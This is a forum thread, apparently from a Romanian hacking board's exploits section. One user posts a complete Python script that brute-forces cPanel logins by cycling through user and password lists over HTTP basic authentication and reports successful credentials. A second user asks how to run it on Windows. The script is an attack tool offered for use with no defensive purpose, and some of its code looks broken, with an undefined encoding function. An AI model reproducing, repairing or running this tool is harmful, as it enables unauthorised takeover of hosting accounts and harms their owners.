Jump to content
MAVNE

cPanel Brute Forcer

By MAVNE, in Exploituri

Recommended Posts

MAVNE Newbie

MAVNE

Posted
Posted

#!usr/bin/python

#cPanel BruteForcer

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, urllib2, httplib, base64

from copy import copy

def title():

print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"

print "\t-----------------------------------------------------\n"

def timer():

now = time.localtime(time.time())

return time.asctime(now)

if len(sys.argv) !=5:

title()

print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"

print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"

sys.exit(1)

try:

users = open(sys.argv[3], "r").readlines()

except(IOError):

print "Error: Check your userlist path\n"

sys.exit(1)

try:

words = open(sys.argv[4], "r").readlines()

except(IOError):

print "Error: Check your wordlist path\n"

sys.exit(1)

wordlist = copy(words)

def reloader():

for word in wordlist:

words.append(word)

def getword():

lock = threading.Lock()

lock.acquire()

if len(words) != 0:

value = random.sample(words, 1)

words.remove(value[0])

else:

print "\nReloading Wordlist - Changing User\n"

reloader()

value = random.sample(words, 1)

users.remove(users[0])

lock.release()

if len(users) ==1:

return users[0], value[0][:-1]

else:

return users[0][:-1], value[0][:-1]

def getauth(url):

req = urllib2.Request(url)

try:

handle = urllib2.urlopen(req)

except IOError, e:

pass

else:

print "This page isn't protected by basic authentication.\n"

sys.exit(1)

if not hasattr(e, 'code') or e.code != 401:

print "\nThis page isn't protected by basic authentication."

print 'But we failed for another reason.\n'

sys.exit(1)

authline = e.headers.get('www-authenticate', '')

if not authline:

print '\nA 401 error without a basic authentication response header - very weird.\n'

sys.exit(1)

else:

return authline

class Worker(threading.Thread):

def run(self):

username, password = getword()

try:

print "-"*12

print "User:",username,"Password:",password

auth_handler = urllib2.HTTPBasicAuthHandler()

auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])

opener = urllib2.build_opener(auth_handler)

urllib2.install_opener(opener)

urllib2.urlopen(server)

print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"

except (urllib2.HTTPError, httplib.BadStatusLine), msg:

#print "An error occurred:", msg

pass

title()

if sys.argv[1][-1] == "/":

sys.argv[1] = sys.argv[1][:-1]

server = sys.argv[1]+":2082"

if sys.argv[2].isdigit() == False:

print "[-] Port must be a number\n"

sys.exit(1)

else:

port = sys.argv[2]

if sys.argv[1][-1] == "/":

sys.argv[1] = sys.argv[1][:-1]

server = sys.argv[1]+":"+port

print "[+] Server:",server

print "[+] Port:",port

print "[+] Users Loaded:",len(users)

print "[+] Words Loaded:",len(words)

print "[+]",getauth(server)

print "[+] Started",timer(),"\n"

for i in range(len(words)*len(users)):

work = Worker()

work.setDaemon(1)

work.start()

time.sleep(1)

print "\n[-] Done -",timer(),"\n"

Caracal Newbie

Caracal

Posted
Posted

tare...da` cum se executa in windows? :)) am luat python pt windows si e cam aiurea :X adica...nu stiu cum sa`l folosesc :oops:

si userlist trebuie sa contina cuvintele ca useri, iar wordlist...cuvintele ca parola, nu? :-S

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...